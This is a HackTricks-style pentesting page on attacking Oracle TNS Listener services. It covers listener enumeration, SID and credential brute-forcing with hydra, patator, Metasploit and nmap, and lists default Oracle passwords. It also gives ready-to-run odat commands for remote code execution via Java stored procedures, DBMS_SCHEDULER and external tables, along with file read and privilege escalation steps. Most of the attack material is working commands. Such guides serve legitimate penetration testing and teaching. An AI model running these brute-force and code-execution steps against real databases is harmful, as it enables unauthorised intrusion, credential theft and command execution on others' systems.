HackTricks
Search…
Pentesting
Powered By GitBook
1521,1522-1529 - Pentesting Oracle TNS Listener

Basic Information

Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation (from here).
When enumerating Oracle the first step is to talk to the TNS-Listener that usually resides on the default port (1521/TCP, -you may also get secondary listeners on 1522–1529-).
1
1521/tcp open oracle-tns Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows)
2
1748/tcp open oracle-tns Oracle TNS Listener
Copied!

Summary

    1.
    Enumerate version info (search for known vulns)
    2.
    Bruteforce TNS listener communication (not always needed)
    3.
    Enumerate/Bruteforce SID names (like database names)
    4.
    Bruteforce credentials for valid SID name discovered
    5.
    Try to execute code
In order to user MSF oracle modules you need to install some dependencies: Installation

Enumeration

Tools that can be used for this are: nmap, MSF and tnscmd10g.

TNS listener version

1
nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>
2
msf> use auxiliary/scanner/oracle/tnslsnr_version
3
#apt install tnscmd10g
4
tnscmd10g version -p 1521 -h <IP>
Copied!
Other useful TNS listener commands:
Command
Purpose
ping
Ping the listener
version
Provide output of the listener version and platform information
status
Return the current status and variables used by the listener
services
Dump service data
debug
Dump debugging information to the listener log
reload
Reload the listener configuration file
save_config
Write the listener configuration file to a backup location
stop
Invoke listener shutdown
If you receive an error, could be because TNS versions are incompatible (Use the --10G parameter with tnscmd10) and if the error persist, the listener may be password protected (you can see a list were all the errors are detailed here) — don't worry… hydra to the rescue:
1
hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener
Copied!

SID enumeration

What is a SID

The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.
In some old versions (in 9 it works) you could ask for the SID and the database send it to you:
1
tnscmd10g status-p 1521 -h <IP> #The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)
2
3
#msf1
4
msf> use auxiliary/scanner/oracle/sid_enum
5
msf> set rhost <IP>
6
msf> run
7
#msf2
8
msf> use auxiliary/admin/oracle/tnscmd
9
msf> set CMD (CONNECT_DATA=(COMMAND=STATUS))
10
msf> set rhost <IP>
11
msf> run #The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)
Copied!
If you cant access this way to the SIDs you will need to bruteforce them:
SID Bruteforce
I have merged the nmap and MSF sid lists into this one (without duplicates):
sids-oracle.txt
5KB
Text
1
hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 <IP> oracle-sid
2
patator oracle_login host=<IP> sid=FILE0 0=sids-oracle.txt -x ignore:code=ORA-12505
3
./odat.py sidguesser -s $SERVER -d $SID --sids-file=./sids.txt
4
msf> use auxiliary/admin/oracle/sid_brute #This will use the list located at /usr/share/metasploit-framework/data/wordlists/sid.txt
5
nmap --script +oracle-sid-brute -p 1521 10.11.1.202 #This will use the list lcated at /usr/share/nmap/nselib/data/oracle-sids
Copied!
In order to use oracle_login with patator you need to install:
1
pip3 install cx_Oracle --upgrade
Copied!

Targeting Accounts

Got SID? Excellent, now let’s move to the next task and extract the user account information. From this point, you can connect to the listener and brute-force credentials.
Metasploit **scanner/oracle/oracle_login It has a built-in dictionary for the most popular default values of user account information presented as login:password. By the way, such default entries represent one of the most popular and serious security problems in Oracle.
Nmap can also help here with the script oracle-brute. Note that this script mixes the logins and passwords, that is, it tries each login against every password, and it takes quite a while!

Default Passwords

Below are some of the default passwords associated with Oracle:
    DBSNMP/DBSNMP — Intelligent Agent uses this to talk to the db server (its some work to change it)
    SYS/CHANGE_ON_INSTALL — Default sysdba account before and including Oracle v9, as of version 10g this has to be different!
    PCMS_SYS/PCMS_SYS — Default x account
    WMSYS/WMSYS — Default x account
    OUTLN/OUTLN — Default x account
    SCOTT/TIGER — Default x account
Other default passwords can be found here and here.
The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to offline brute force. Read more about this technique here.

User/Pass bruteforce

Different tools offered different user/pass lists for oracle:
    oscan: /usr/share/oscanner/accounts.default (169 lines)
    MSF-1: from admin/oracle/oracle_login __/usr/share/metasploit-framework/data/wordlists/oracle_default_passwords.csv (598 lines)
    MSF-2: from scanner/oracle/oracle_login /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt (568 lines)
    Nmap: /usr/share/nmap/nselib/data/oracle-default-accounts.lst (687 lines)
I have mixed all of them and removed duplicates:
users-oracle.txt
9KB
Text
pass-oracle.txt
9KB
Text
Now, that you know a valid SID and valid credentials. To connect to the database you need the tool: sqlplus and to install it you need to follow some steps:
To login using known credentials:
1
sqlplus <username>/<password>@<ip_address>/<SID>;
Copied!
If the TNS Listener is on a non-default port (e.g. TCP/1522) :
1
sqlplus <username>/<password>@<ip_address>:<port>/<SID>;
Copied!
If an account has system database priviledges (sysdba) or system operator (sysop) you may wish to try the following:
1
sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba';
2
#Example:
3
sqplus SYSTEM/[email protected]/ORCL 'as sysdba'
Copied!

All in One

An interesting tool is oscanner, which will try to get some valid SID and then it will brute-force for valid credentials and try to extract some information:
1
#apt install oscanner
2
oscanner -s <IP> -P <PORT>
Copied!
Another tool that will do all of this it odat:
1
git clone https://github.com/quentinhardy/odat.git
2
cd odat
3
./odat.py --help #It shouldn't be problems in Kali
4
./odat.py all -s <IP> -p <PORT>
5
./odat.py all -s <IP> -p <PORT> -d <SID> #To bruteforce accounts for that SID
Copied!
With these options (-s and -p), ODAT will search valid SID (System ID) in a first step. You can configure some options for configuring methods (i.e. word-list or brute-force attack). By default, ODAT will use a big word list and it will do a small brute-force attack.
If ODAT founds at least one SID (e.g. ORCL), it will search valid Oracle accounts. It will do that on each SID found. You can specify some options for credentials (e.g. --accounts-file, --accounts-files, --login-as-pwd).
For each valid account (e.g. SYS) on each valid instance (SID), ODAT will return what each Oracle user can do (e.g. reverse shell, read files, become DBA).
Wiki odat****

Remote Code Execution

There are at least two different ways to execute commands, such as by using Java procedures and DBMS_SCHEDULER package. By the way, you can also achieve RCE in case of SQL injection in a web application provided, of course, that the user running it has sufficient rights. At this stage, I highly recommend preparing the Oracle Database Attacking Tool: ODAT.

Install ODAT

1
git clone https://github.com/quentinhardy/odat.git
2
cd odat
3
./odat.py #It shouldn't be problems in Kali
Copied!

Execute Code via Java Stored Procedure

1
./odat.py java -s <IP> -U <username> -P <password> -d <SID> --exec COMMAND
Copied!

Execute code via Scheduler

1
./odat.py dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --exec "C:\windows\system32\cmd.exe /c echo 123&gt;&gt;C:\hacK"
Copied!

Execute code via External Tables

1
./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --exec "C:/windows/system32" "calc.exe"
Copied!
‘ODAT.py’ requires the privilege ‘CREATE ANY DIRECTORY’, which, by default, is granted only to DBA role, since it attempts to execute the file from any and not only “your” directory (the manual version of this attack requires less privileges).

Read/Write files

1
./odat.py utlfile -s <IP> -d <SID> -U <username> -P <password> --getFile "C:/test" token.txt token.txt
2
./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --getFile "C:/test" "my4.txt" "my"
Copied!

Elevating Privileges

You can use the privesc module from odat to escalate privileges. In that link you can find several ways to escalate privileges using odat.
1
./odat.py privesc -s $SERVER -d $ID -U $USER -P $PASSWORD -h #Get module Help
Copied!
Vulnerability tested on oracle 10.1.0.3.0 – should work on thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical Patch update October 2007.
1
msf> use auxiliary/sqli/oracle/lt_findricset_cursor
Copied!

Free Virtual Environment for testing

If you want to practice attacking Oracle databases, the safest way is to register for the Oracle Developer Days Virtualbox VM:
Developer Day - Hands-on Database Application Development
Other interesting references:

HackTricks Automatic Commands

1
Protocol_Name: Oracle #Protocol Abbreviation if there is one.
2
Port_Number: 1521 #Comma separated if there is more than one.
3
Protocol_Description: Oracle TNS Listener #Protocol Abbreviation Spelled out
4
5
Entry_1:
6
Name: Notes
7
Description: Notes for Oracle
8
Note: |
9
Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation
10
11
#great oracle enumeration tool
12
navigate to https://github.com/quentinhardy/odat/releases/
13
download the latest
14
tar -xvf odat-linux-libc2.12-x86_64.tar.gz
15
cd odat-libc2.12-x86_64/
16
./odat-libc2.12-x86_64 all -s 10.10.10.82
17
18
for more details check https://github.com/quentinhardy/odat/wiki
19
20
https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener
21
22
Entry_2:
23
Name: Nmap
24
Description: Nmap with Oracle Scripts
25
Command: nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP}
Copied!
Last modified 1mo ago